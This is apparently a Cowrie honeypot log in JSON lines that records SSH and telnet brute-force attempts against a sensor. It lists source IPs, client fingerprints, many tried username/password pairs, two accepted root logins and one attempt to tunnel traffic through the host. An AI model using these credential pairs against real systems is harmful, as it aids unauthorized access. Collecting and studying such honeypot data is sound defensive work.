{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:53:42.840673Z","src_ip":"212.227.235.229","session":"c30199150061"}
{"eventid":"cowrie.login.failed","username":"wuhan","password":"wuhan","message":"login attempt [wuhan/wuhan] failed","sensor":"my-vps","timestamp":"2025-08-26T03:53:43.643689Z","src_ip":"212.227.235.229","session":"c30199150061"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:43.716358Z","src_ip":"68.183.87.241","session":"d0f78f5a8fe4"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:53:44.913885Z","src_ip":"212.227.235.229","session":"c30199150061"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"d09ca9edfd01","protocol":"ssh","message":"New connection: 68.183.87.241:55398 (1.2.3.4:22) [session: d09ca9edfd01]","sensor":"my-vps","timestamp":"2025-08-26T03:54:53.181153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:54:53.182393Z","src_ip":"68.183.87.241","session":"d09ca9edfd01"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:54:53.439014Z","src_ip":"68.183.87.241","session":"d09ca9edfd01"}
{"eventid":"cowrie.login.failed","username":"dzq","password":"dzq","message":"login attempt [dzq/dzq] failed","sensor":"my-vps","timestamp":"2025-08-26T03:54:54.510641Z","src_ip":"68.183.87.241","session":"d09ca9edfd01"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:54:55.768991Z","src_ip":"68.183.87.241","session":"d09ca9edfd01"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":57590,"dst_ip":"1.2.3.4","dst_port":22,"session":"406de02d828c","protocol":"ssh","message":"New connection: 103.217.145.104:57590 (1.2.3.4:22) [session: 406de02d828c]","sensor":"my-vps","timestamp":"2025-08-26T03:54:59.365191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:54:59.366071Z","src_ip":"103.217.145.104","session":"406de02d828c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:54:59.624576Z","src_ip":"103.217.145.104","session":"406de02d828c"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"Jay56","message":"login attempt [localhost/Jay56] failed","sensor":"my-vps","timestamp":"2025-08-26T03:55:00.709229Z","src_ip":"103.217.145.104","session":"406de02d828c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:55:01.971437Z","src_ip":"103.217.145.104","session":"406de02d828c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53288,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e4707b506c","protocol":"ssh","message":"New connection: 212.227.235.229:53288 (1.2.3.4:22) [session: 95e4707b506c]","sensor":"my-vps","timestamp":"2025-08-26T03:55:04.581970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:55:04.582784Z","src_ip":"212.227.235.229","session":"95e4707b506c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:55:05.796679Z","src_ip":"212.227.235.229","session":"95e4707b506c"}
{"eventid":"cowrie.login.failed","username":"manager","password":"P@ssw0rd","message":"login attempt [manager/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T03:55:06.544201Z","src_ip":"212.227.235.229","session":"95e4707b506c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:55:07.794748Z","src_ip":"212.227.235.229","session":"95e4707b506c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56881,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c8fa3d1b365","protocol":"ssh","message":"New connection: 212.227.235.229:56881 (1.2.3.4:22) [session: 6c8fa3d1b365]","sensor":"my-vps","timestamp":"2025-08-26T03:55:12.370360Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:55:12.371466Z","src_ip":"212.227.235.229","session":"6c8fa3d1b365"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57255,"dst_ip":"1.2.3.4","dst_port":22,"session":"6502da652641","protocol":"ssh","message":"New connection: 212.227.235.229:57255 (1.2.3.4:22) [session: 6502da652641]","sensor":"my-vps","timestamp":"2025-08-26T03:55:12.483184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:55:12.484056Z","src_ip":"212.227.235.229","session":"6502da652641"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T03:55:12.619201Z","src_ip":"212.227.235.229","session":"6502da652641"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:55:13.027573Z","src_ip":"212.227.235.229","session":"6502da652641"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T03:55:13.168135Z","session":"6502da652641"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":45780,"dst_ip":"1.2.3.4","dst_port":22,"session":"e522eda64ce2","protocol":"ssh","message":"New connection: 68.183.87.241:45780 (1.2.3.4:22) [session: e522eda64ce2]","sensor":"my-vps","timestamp":"2025-08-26T03:56:10.799787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:56:10.800703Z","src_ip":"68.183.87.241","session":"e522eda64ce2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:56:11.059922Z","src_ip":"68.183.87.241","session":"e522eda64ce2"}
{"eventid":"cowrie.login.failed","username":"web","password":"12345678","message":"login attempt [web/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T03:56:12.136456Z","src_ip":"68.183.87.241","session":"e522eda64ce2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:56:13.397277Z","src_ip":"68.183.87.241","session":"e522eda64ce2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:56:22.482866Z","src_ip":"212.227.235.229","session":"6502da652641"}
{"eventid":"cowrie.session.connect","src_ip":"112.170.104.101","src_port":55429,"dst_ip":"1.2.3.4","dst_port":23,"session":"25c7c1c24bf1","protocol":"telnet","message":"New connection: 112.170.104.101:55429 (1.2.3.4:23) [session: 25c7c1c24bf1]","sensor":"my-vps","timestamp":"2025-08-26T03:56:22.678940Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":37122,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc9025d87ee","protocol":"ssh","message":"New connection: 103.217.145.104:37122 (1.2.3.4:22) [session: edc9025d87ee]","sensor":"my-vps","timestamp":"2025-08-26T03:56:23.690781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:56:23.691692Z","src_ip":"103.217.145.104","session":"edc9025d87ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:56:23.967336Z","src_ip":"103.217.145.104","session":"edc9025d87ee"}
{"eventid":"cowrie.login.failed","username":"i","password":"i","message":"login attempt [i/i] failed","sensor":"my-vps","timestamp":"2025-08-26T03:56:25.106740Z","src_ip":"103.217.145.104","session":"edc9025d87ee"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:56:26.383692Z","src_ip":"103.217.145.104","session":"edc9025d87ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56308,"dst_ip":"1.2.3.4","dst_port":22,"session":"61dc71a2cd29","protocol":"ssh","message":"New connection: 212.227.235.229:56308 (1.2.3.4:22) [session: 61dc71a2cd29]","sensor":"my-vps","timestamp":"2025-08-26T03:56:28.201525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:56:28.202475Z","src_ip":"212.227.235.229","session":"61dc71a2cd29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:56:29.418614Z","src_ip":"212.227.235.229","session":"61dc71a2cd29"}
{"eventid":"cowrie.login.failed","username":"vhserver","password":"vhserver123","message":"login attempt [vhserver/vhserver123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:56:30.180987Z","src_ip":"212.227.235.229","session":"61dc71a2cd29"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:56:31.441372Z","src_ip":"212.227.235.229","session":"61dc71a2cd29"}
{"eventid":"cowrie.session.closed","duration":30.514548778533936,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:56:53.193423Z","src_ip":"112.170.104.101","session":"25c7c1c24bf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47230,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e7e7c0ea7b4","protocol":"ssh","message":"New connection: 212.227.235.229:47230 (1.2.3.4:22) [session: 2e7e7c0ea7b4]","sensor":"my-vps","timestamp":"2025-08-26T03:57:11.648637Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:57:11.649546Z","src_ip":"212.227.235.229","session":"2e7e7c0ea7b4"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T03:57:11.856740Z","src_ip":"212.227.235.229","session":"2e7e7c0ea7b4"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe","message":"login attempt [frappe/frappe] failed","sensor":"my-vps","timestamp":"2025-08-26T03:57:12.479337Z","src_ip":"212.227.235.229","session":"2e7e7c0ea7b4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:13.688624Z","src_ip":"212.227.235.229","session":"2e7e7c0ea7b4"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":46204,"dst_ip":"1.2.3.4","dst_port":22,"session":"f62e1f770763","protocol":"ssh","message":"New connection: 45.88.8.215:46204 (1.2.3.4:22) [session: f62e1f770763]","sensor":"my-vps","timestamp":"2025-08-26T03:57:21.522289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:57:22.036656Z","src_ip":"45.88.8.215","session":"f62e1f770763"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:57:22.037335Z","src_ip":"45.88.8.215","session":"f62e1f770763"}
{"eventid":"cowrie.login.success","username":"root","password":"Kirtan@123","message":"login attempt [root/Kirtan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:57:23.461381Z","src_ip":"45.88.8.215","session":"f62e1f770763"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:57:23.834471Z","src_ip":"45.88.8.215","session":"f62e1f770763"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":51036,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b43f12a950d","protocol":"ssh","message":"New connection: 68.183.87.241:51036 (1.2.3.4:22) [session: 0b43f12a950d]","sensor":"my-vps","timestamp":"2025-08-26T03:57:24.227076Z"}
